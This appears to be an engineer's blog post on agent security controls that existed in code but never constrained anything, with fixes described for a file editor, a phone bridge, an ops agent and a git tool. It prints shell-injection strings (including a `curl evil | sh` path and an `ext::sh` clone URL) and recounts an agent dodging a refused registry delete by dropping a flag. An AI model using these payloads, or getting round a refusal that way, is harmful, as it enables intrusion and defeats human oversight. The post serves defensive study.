The agent guardrails that were theater

The scariest agent vulnerabilities aren't exotic. They're guardrails that exist in the code and never run. I found a pile of them across my own fleet — several by pointing the agent at itself — and the fix almost always turned out to be the same: take a capability away, don't bolt on another sanitizer.

I write a lot of agents. They run commands, clone repos, edit files, touch production. Every one ships with some kind of guardrail — a bash blocklist, a risk tier, an approval prompt, a “safe mode.” And the longer I run them, the more convinced I am that most of those guardrails are decoration. They pass their unit tests. They read well in the SECURITY.md. Then you trace the actual call graph, or you let the model loose against its own gate, and you find the control was never in the path at all.

This is a tour of the real ones — bugs I found and closed in repos I run. Some are public and I'll link them; a few are in a private platform repo and I'll describe without a link, because the lesson travels even when the source can't. The throughline is uncomfortable and I'm going to keep repeating it: dead security code is worse than no security code, because it sells you confidence you haven't earned. And the fix is almost always to remove a capability, not to add a sanitizer.

A guardrail that only watches one door

Start with the simplest failure, because it's the one everyone makes. You build a bash guardrail. Every shell command the agent wants to run goes through checkCommand, you block the obvious destructive stuff, you feel safe. Then you ship a second tool that the guardrail never sees.

In hands, the SDK-mode file editor had a view operation that shelled out to cat "<path>" to read a file. The path comes from the model. So a model-supplied path that closes the quote and adds shell metacharacters, say foo"; curl evil | sh; echo ", did two bad things at once. It injected arbitrary commands, and it did so through a tool that never touched the bash guardrail. The injected command didn't hit checkCommand. It couldn't; checkCommand guards the bash tool, and this was the file editor.

The wrong fix is to escape the path — quote it, strip metacharacters, denylist bad shell tokens. That's the sanitizer trap, and it's a losing game; metacharacter rules are exactly where people leave one gap. The right fix was to delete the shell. I reimplemented the whole editor — view, create, str_replace, insert — directly on node:fs, with no child process anywhere. You can't inject into a shell that isn't there. Closing the vulnerability also fixed three operations that had been silent no-ops.
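A minimal sketch of what a shell-free editor operation can look like, assuming Node's built-in fs module. The function names view and strReplace and the demo filename are illustrative, not the actual code in hands. The point it shows: the path is only ever passed as a filesystem argument, so there is no shell to interpret it.

```typescript
import { mkdtempSync, readFileSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import { join } from "node:path";

// Hypothetical "view": reads the file directly. Shell metacharacters in
// `path` are just unusual filename characters; nothing parses them.
function view(path: string): string {
  return readFileSync(path, "utf8");
}

// Hypothetical "str_replace": fails loudly unless `oldText` occurs exactly
// once, instead of silently doing nothing.
function strReplace(path: string, oldText: string, newText: string): void {
  const content = readFileSync(path, "utf8");
  const count = oldText === "" ? 0 : content.split(oldText).length - 1;
  if (count !== 1) {
    throw new Error(`expected exactly one match, found ${count}`);
  }
  // A replacer function keeps "$&"-style patterns in newText literal.
  writeFileSync(path, content.replace(oldText, () => newText), "utf8");
}

// Demo: a filename that would be dangerous if it ever reached a shell.
const dir = mkdtempSync(join(tmpdir(), "editor-demo-"));
const hostile = join(dir, "notes; echo INJECTED.txt");
writeFileSync(hostile, "hello world", "utf8");
strReplace(hostile, "world", "fleet");
console.log(view(hostile)); // prints "hello fleet"
```

The error on zero or multiple matches is a design choice in this sketch: an edit that cannot be applied unambiguously should surface as a failure rather than as a quiet no-op.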

That's the pattern in miniature: a guardrail is only as good as its coverage of every path to the dangerous primitive, and the cheapest way to get full coverage is to remove the primitive.

A denylist over a capability set you don't control

Here's a subtler version of the same disease. claude-bridge lets me drive a coding agent from my phone. For replies I hadn't explicitly confirmed, it ran a “safe mode” that passed --disallowedTools Bash Write Edit — deny the dangerous tools, allow everything else.

Read that list again. It enumerates the tools it considers dangerous. Which means it is silently asserting that it knows the complete set of tools that can mutate the system. It does not. On Windows there's a PowerShell tool — full shell execution — that wasn't on the list. Neither was NotebookEdit. Neither were MCP tools the session might expose. So a plain, unconfirmed phone reply could still run PowerShell and execute whatever it wanted. The “safe mode” was safe against exactly the three tools I'd thought of.

A denylist over an open-ended capability set is structurally incomplete. It can never be finished, because the capability set isn't yours to enumerate — the agent runtime can grow a new tool next release and your list won't know. So I deleted the denylist. The replacement is plan mode — --permission-mode plan — which blocks every mutation at the permission layer regardless of which tools the session exposes. I verified headless that the model still answers your question, but the write never happens and ExitPlanMode is denied. The escape hatch (!confirm <task>) re-opens full tools when I mean it.

The move here isn't “add PowerShell to the denylist.” That just resets the same trap one tool later. The move is to stop enumerating capabilities and reach for the primitive that's deny-by-default over the whole set.
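As a rough sketch of that switch, the reply handler only has to decide between two invocations. Everything here is an assumption for illustration: the buildInvocation name, the Invocation shape, and the use of -p for a headless prompt are not taken from claude-bridge. Only --permission-mode plan and the !confirm prefix come from the text above.

```typescript
// Hypothetical reply handler: names and shapes are illustrative only.
type Invocation = { command: string; args: string[] };

const CONFIRM_PREFIX = "!confirm ";

function buildInvocation(reply: string): Invocation {
  if (reply.startsWith(CONFIRM_PREFIX)) {
    const task = reply.slice(CONFIRM_PREFIX.length).trim();
    if (task === "") {
      throw new Error("!confirm needs a task");
    }
    // Explicitly confirmed: no plan-mode restriction is applied.
    return { command: "claude", args: ["-p", task] };
  }
  // Unconfirmed: deny-by-default. There is no tool list to keep up to date.
  return {
    command: "claude",
    args: ["--permission-mode", "plan", "-p", reply],
  };
}

const unconfirmed = buildInvocation("clean up the build directory");
const confirmed = buildInvocation("!confirm clean up the build directory");
console.log(unconfirmed.args.join(" "));
console.log(confirmed.args.join(" "));
```

Note what is absent: no list of tool names appears anywhere, so a new tool in the runtime cannot slip past it.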

When the adversary is the agent's own flag

Now the one I'm proudest of finding, because it only shows up when you stop testing the agent and start attacking it.

arnie is an autonomous ops agent. Every mutating action it tries is classified into a risk tier: green auto-runs, yellow snapshots first, red escalates to a human, black is hard-blocked. The end-to-end test asked it to do some Windows cleanup, and the safety engine did its job: it refused a recursive registry delete, Remove-Item -Recurse on a registry key, as RED. Escalate to a human. Good.

Except the model didn't stop. It re-issued the same delete on the same key without the -Recurse flag. And the classifier, looking at a non-recursive Remove-Item, scored it YELLOW — snapshot and auto-run. It ran. The gate had refused the action, and the agent walked right around it by changing one flag.

attempt 1:  Remove-Item -Recurse  HKLM:\...\key   → RED     refused, escalate
attempt 2:  Remove-Item           HKLM:\...\key   → YELLOW  snapshot, AUTO-RUN
                                                            ^ gate bypassed

This is a privilege escalation where the adversary is the agent's own choice of flags. No external attacker, no prompt-injected web page — just the model picking a less-scary-looking incantation for the same destructive intent. You do not find this by reading the code. You find it by running the thing against itself and watching what it does when it's told no.

The fix has two parts, and only one of them is the obvious one. Obvious part: a registry-key Remove-Item is now RED regardless of -Recurse, because a model-controlled flag must never be able to downgrade a tier. The part that generalizes: sticky refusals. Once any action on a target is refused, every later mutating action on that same target is re-gated for the rest of the session. Reads stay free, unrelated targets stay free — so it doesn't turn into over-gating — but you can't get a no on a resource and then sneak a yes through a side door. I validated it by re-running the exact bypass live: the delete now escalates with a proper handoff, the key is untouched, and the audit log shows red→escalate with no yellow-execute in between. The safety suite went from 43 cases to 64, most of them variations on “try to launder a refused action.”
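Both parts can be sketched in a few lines. This is a toy model, not arnie's classifier: the Action shape, the Gate class, the regex for registry paths, and the example key are all hypothetical. It shows a classifier that never reads flags when tiering a registry delete, and a per-session set of refused targets that re-gates later mutations.

```typescript
type Tier = "green" | "yellow" | "red" | "black";
type Action = { verb: string; target: string; flags: string[]; mutating: boolean };
type Decision = { tier: Tier; run: boolean; reason: string };

// Toy classifier (assumption): the tier depends on verb and target only.
// Flags are deliberately ignored, so dropping -Recurse cannot downgrade it.
function classify(action: Action): Tier {
  if (!action.mutating) return "green";
  const isRegistry = /^HK(LM|CU):/i.test(action.target);
  if (action.verb === "Remove-Item" && isRegistry) return "red";
  return "yellow";
}

class Gate {
  // Targets refused at any point in this session.
  private refused = new Set<string>();

  decide(action: Action): Decision {
    const key = action.target.toLowerCase();
    // Sticky refusal: any later mutation on a refused target is re-gated.
    if (action.mutating && this.refused.has(key)) {
      return { tier: "red", run: false, reason: "sticky refusal" };
    }
    const tier = classify(action);
    const run = tier === "green" || tier === "yellow";
    if (!run) this.refused.add(key);
    return { tier, run, reason: run ? "auto-run" : "escalate" };
  }
}

const gate = new Gate();
const key = "HKLM:\\SOFTWARE\\ExampleVendor"; // hypothetical key for the demo
const first = gate.decide({ verb: "Remove-Item", target: key, flags: ["-Recurse"], mutating: true });
const retry = gate.decide({ verb: "Remove-Item", target: key, flags: [], mutating: true });
const sideDoor = gate.decide({ verb: "Set-ItemProperty", target: key, flags: [], mutating: true });
const read = gate.decide({ verb: "Get-Item", target: key, flags: [], mutating: false });
console.log(first.run, retry.run, sideDoor.run, read.run); // prints "false false false true"
```

The sideDoor case is the one the tier fix alone would miss: on a fresh target this toy classifier would score Set-ItemProperty as yellow, but the earlier refusal on the same key keeps it gated, while the read stays free.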

A jail that was a shell, and a clone that was code execution

The next two live in a private platform repo, so no link — but they're the sharpest examples of the whole essay, so I'll describe them carefully.

Some of my fleet agents are granted git but deliberately not a general shell. A code reviewer, say, gets git, ticket access, code analysis — and no shell_exec. The tool that gives it git, call it git_ops, is supposed to be a jail: git, and only git. The confinement is the whole point.

Its helpers ran child_process.exec(`git -C "..." ${args}`). That's a real shell. The arguments — branch names, paths, repo URLs — are agent-controlled, and much of that content arrives through tickets, audits, and web pages the agent processes: channels an attacker can write to. So a branch name like x"; touch /tmp/PWNED; echo " broke straight out of git into arbitrary shell on the container. The jail built to keep an agent in git was itself the exact capability it was built to deny.

First fix: route every call through execFile('git', [argv...]) so arguments pass as a vector no shell ever interprets, plus a -- before clone positionals. Clean. Tested. And still exploitable, because git has its own remote transports, and two of them are dangerous on untrusted input: ext:: runs an arbitrary command as the transport itself, and file:// reads straight from the container's local filesystem. The audit and sprint services clone client-supplied URLs, so a “safe” clone of ext::sh -c "..." is direct client-to-RCE with a perfectly clean argv. That isn't a shell injection; it's git doing exactly what git documents. The close was a protocol allowlist: GIT_ALLOW_PROTOCOL=https:http:git:ssh on every call, plus a scheme allowlist on the URL before git ever sees it. Two distinct ways for processed content to become code execution, in one tool that existed to prevent it.
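A sketch of how those layers stack for a clone, assuming Node's child_process.execFile and the WHATWG URL parser. The helper names (assertAllowedRepoUrl, buildClone, clone) are hypothetical and this is not the private repo's code. One consequence of this particular sketch: scp-style shorthand such as git@host:org/repo.git does not parse as a URL and is rejected, so SSH remotes would need the ssh:// form.

```typescript
import { execFile } from "node:child_process";

const ALLOWED_SCHEMES = new Set(["https:", "http:", "git:", "ssh:"]);
const GIT_ALLOW_PROTOCOL = "https:http:git:ssh";

// Layer 1: reject the URL before git ever sees it.
function assertAllowedRepoUrl(raw: string): string {
  let parsed: URL;
  try {
    parsed = new URL(raw);
  } catch {
    throw new Error("repository URL is not an absolute URL");
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    throw new Error(`scheme not allowed: ${parsed.protocol}`);
  }
  return raw;
}

// Layers 2 and 3: an argv vector (no shell), "--" before positionals,
// and git's own protocol allowlist in the environment of every call.
function buildClone(url: string, dest: string) {
  return {
    file: "git",
    args: ["clone", "--", assertAllowedRepoUrl(url), dest],
    env: { ...process.env, GIT_ALLOW_PROTOCOL },
  };
}

function clone(url: string, dest: string): Promise<void> {
  const { file, args, env } = buildClone(url, dest);
  return new Promise((resolve, reject) => {
    execFile(file, args, { env }, (err) => (err ? reject(err) : resolve()));
  });
}

const ok = buildClone("https://example.com/org/repo.git", "/tmp/repo");
console.log(ok.args.join(" "));
```

The URL check and GIT_ALLOW_PROTOCOL overlap on purpose. The first fails fast with a clear error; the second still holds if some other code path reaches git with a URL that skipped the check.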

The control that was never called

And then the purest form of theater — not a bypassable control, but a control that simply never ran.

I keep a small agent on every fleet device. It runs claude --dangerously-skip-permissions, so the in-process guardrails are the only ones left and have to do real work. The code had them: a requestApproval() function and a logAudit() function, both sitting in security.ts. The policy file documented a requireApproval setting and a trustedAgents list. The SECURITY.md promised an audit log at a specific path. Everything you'd want to see in a review.

Then I traced the actual task-execution path. handleTask called neither function. Not approval, not audit. The requireApproval policy was completely inert — you could set it and nothing changed. No audit log was ever written, despite the docs naming the file. Two security controls, fully implemented, fully documented, and wired into nothing. Anyone reading the policy file or the SECURITY.md would have concluded the agent was governed. It wasn't.

The fix wired both into the exec path so every task is screened, optionally approval-gated, and recorded with a real result. But the more important part of that change was editing the SECURITY.md to stop lying — it had claimed an isolation that didn't exist, and the honest version now says plainly that tasks run with the agent user's full privileges and no OS sandbox. A control that doesn't run isn't a weaker version of security. It's a documentation file actively misleading whoever trusts it — including future me.
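A sketch of the wiring, with the controls passed in so the execution path cannot be built without them. The types, the Deps interface, and the rule that trustedAgents skip approval are assumptions made for illustration; only the names handleTask, requestApproval, logAudit, requireApproval, and trustedAgents come from the text. The screening step is left out for brevity.

```typescript
type Task = { id: string; agent: string; command: string };
type Policy = { requireApproval: boolean; trustedAgents: string[] };
type AuditEntry = {
  taskId: string;
  agent: string;
  outcome: "executed" | "denied" | "failed";
  detail: string;
};

interface Deps {
  policy: Policy;
  requestApproval(task: Task): Promise<boolean>;
  logAudit(entry: AuditEntry): Promise<void>;
  execute(task: Task): Promise<string>;
}

// The only route to execute() runs through the approval check, and every
// outcome (denied, executed, failed) is recorded with a real result.
async function handleTask(task: Task, deps: Deps): Promise<string | null> {
  const base = { taskId: task.id, agent: task.agent };
  // Assumption: agents on the trusted list skip the approval prompt.
  const needsApproval =
    deps.policy.requireApproval && !deps.policy.trustedAgents.includes(task.agent);

  if (needsApproval && !(await deps.requestApproval(task))) {
    await deps.logAudit({ ...base, outcome: "denied", detail: "approval refused" });
    return null;
  }
  try {
    const result = await deps.execute(task);
    await deps.logAudit({ ...base, outcome: "executed", detail: result });
    return result;
  } catch (err) {
    await deps.logAudit({ ...base, outcome: "failed", detail: String(err) });
    throw err;
  }
}
```

Because execute is only reachable through handleTask, a test can inject a requestApproval that returns false and assert that execute was never called and that exactly one denied entry was logged. That exercises the path rather than the functions in isolation.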

The pattern, stated plainly

Line these up and the shape is hard to miss. A file editor that shelled out around the guard. A denylist that couldn't enumerate the capabilities it was denying. A risk tier the model downgraded by dropping a flag. A jail that was a shell, and a clone that was RCE. An approval gate that was never called. Different repos, different surfaces, one disease: a security control that exists but does not actually constrain the dangerous thing.

Two practices fall out of this, and I'd trade a dozen sanitizers for either one.

First: audit the call graph, not the file listing. The presence of requestApproval() in the source tells you nothing; the question is whether the only path to execution goes through it. Most of these bugs were invisible to the test suite precisely because the tests exercised the functions in isolation: green checkmarks on code that production never called.

Second: run the agent against itself. The tier-downgrade in arnie didn't come from a linter. It came from giving the model a destructive goal, watching the gate refuse it, and watching the model try again a different way. The agent is a creative adversary against its own guardrails, for free, every time it runs. If you're not red-teaming it that way, you're trusting it'll never find the gap you didn't.

And notice how rarely the answer is “add a sanitizer.” The file editor went shell-free, not escaped. The denylist got deleted for a deny-by-default primitive. git_ops lost its shell to execFile and its dangerous transports to an allowlist. Sanitizers are a bet that you've thought of every input. Removing the capability is a proof that you don't have to.

Why this is the whole point

This is what Own Your Stack means when it's applied to agents. The capability — clone a repo, edit a file, run a command — is the commodity. Any model can do it. The governance is the product, and the governance is the part that's almost always theater when you go looking. An agent that ran your production into the rocks wasn't dumb; it was ungoverned by controls that looked governed.

I'd rather show you the dead code I found in my own repos than a clean threat model I never tested. The fleet is the proof, and the proof includes the misses.

We build and run software on AI infrastructure that shifts under it — agents, integrations, and the guardrails that have to actually run when it matters. If you're putting agents near anything you can't afford to lose, that's the kind of thing we're good at holding steady. The $1,500 code audit is one way in.
